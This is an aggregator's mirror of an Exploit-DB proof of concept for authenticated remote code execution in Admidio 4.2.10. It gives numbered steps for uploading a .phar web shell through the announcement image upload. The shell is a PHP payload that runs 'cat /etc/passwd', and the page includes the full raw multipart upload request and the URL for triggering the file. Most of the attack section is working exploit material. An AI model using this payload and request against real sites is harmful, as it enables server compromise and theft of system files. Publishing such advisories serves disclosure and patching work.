3

[webapps] Admidio v4.2.10 - Remote Code Execution (RCE)

 1 year ago
source link: https://www.exploit-db.com/exploits/51590
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Admidio v4.2.10 - Remote Code Execution (RCE)

EDB-ID:

51590

EDB Verified:

Platform:

PHP

Date:

2023-07-15

Vulnerable App:

Exploit Title: Admidio v4.2.10 - Remote Code Execution (RCE)
Application: Admidio
Version: 4.2.10
Bugs:  RCE
Technology: PHP
Vendor URL: https://www.admidio.org/
Software Link: https://www.admidio.org/download.php
Date of found: 10.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux


2. Technical Details & POC
========================================
Steps:

1. Login to account
2. Go to Announcements
3. Add Entry
4. Upload .phar file in image upload section.
.phar file Content
<?php echo system('cat /etc/passwd');?>
5. Visit .phar file  ( http://localhost/admidio/adm_my_files/announcements/images/20230710-172217_430o3e5ma5dnuvhp.phar )

Request:

POST /admidio/adm_program/system/ckeditor_upload_handler.php?CKEditor=ann_description&CKEditorFuncNum=1&langCode=en HTTP/1.1
Host: localhost
Content-Length: 378
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryne9TRuC1tAqhR86r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/admidio/adm_program/modules/announcements/announcements_new.php?headline=Announcements
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ADMIDIO_admidio_adm_cookieconsent_status=dismiss; ADMIDIO_admidio_adm_SESSION_ID=penqrouatvh0vmp8v2mdntrgdn; ckCsrfToken=o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB
Connection: close

------WebKitFormBoundaryne9TRuC1tAqhR86r
Content-Disposition: form-data; name="upload"; filename="shell.phar"
Content-Type: application/octet-stream

<?php echo system('cat /etc/passwd');?>

------WebKitFormBoundaryne9TRuC1tAqhR86r
Content-Disposition: form-data; name="ckCsrfToken"

o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB
------WebKitFormBoundaryne9TRuC1tAqhR86r--

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK